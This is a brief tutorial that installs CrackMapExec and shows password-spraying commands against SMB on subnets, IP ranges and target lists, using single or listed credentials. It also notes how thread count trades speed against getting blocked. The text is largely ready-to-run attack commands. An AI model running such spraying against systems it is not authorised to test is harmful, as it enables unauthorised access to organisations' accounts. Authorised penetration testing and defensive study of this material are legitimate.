Password spraying attack is commonly used against Corporative Networks, which’s idea is really simple, you’re specifying protocol (SMB, Winrm or other supported protocol) and depending on your parameters CrackMapExec tries different or static credentials against many or single target.
Installing CrackMapExec (CME)
to run crackmapexec first you need to have python3 installed, which can be done by running few simple commands (Kali linux already comes with pre-installed CME):
python3 -m pip install pipx
pipx ensurepath
pipx install crackmapexec
and that’s all, now you have CrackMapExec Installed.
Usage
CrackMapExec can be used to attack different protocols, like SMB, SSH, and others.
which you can see by running
crackmapexec --help
in this examples, I’ll use the SMB protocol.
This is few examples that you might find useful:
command structure:
crackmapexec [PROTOCOL] [OPTIONS]
- Attacking 10.10.10.1/24 network with static credentials:
crackmapexec smb 10.10.10.1/24 -u alex -p alexhavepassword
- Attacking IPs from 10.10.10.5 to 10.10.10.25 with static credentials:
crackmapexec smb 10.10.10.5-10.10.10.25 -u alex -p alexhavepassword
- Attacking 10.10.10.22 with dynamic credentials:
crackmapexec smb 10.10.10.22 -u /home/user/Desktop/users.txt -p /home/user/Desktop/passwords.txt
- Attacking custom list of target (Not Range) with dynamic credentials:
crackmapexec smb /home/user/Desktop/targets.txt -u /home/user/Desktop/users.txt -p /home/user/Desktop/passwords.txt
you can play with threads number (-t option) of CME which might make your attack faster or cause you to get blocked.
(Depends on protocols and configurations)
that was short review of CrackMapExec, Happy Hacking.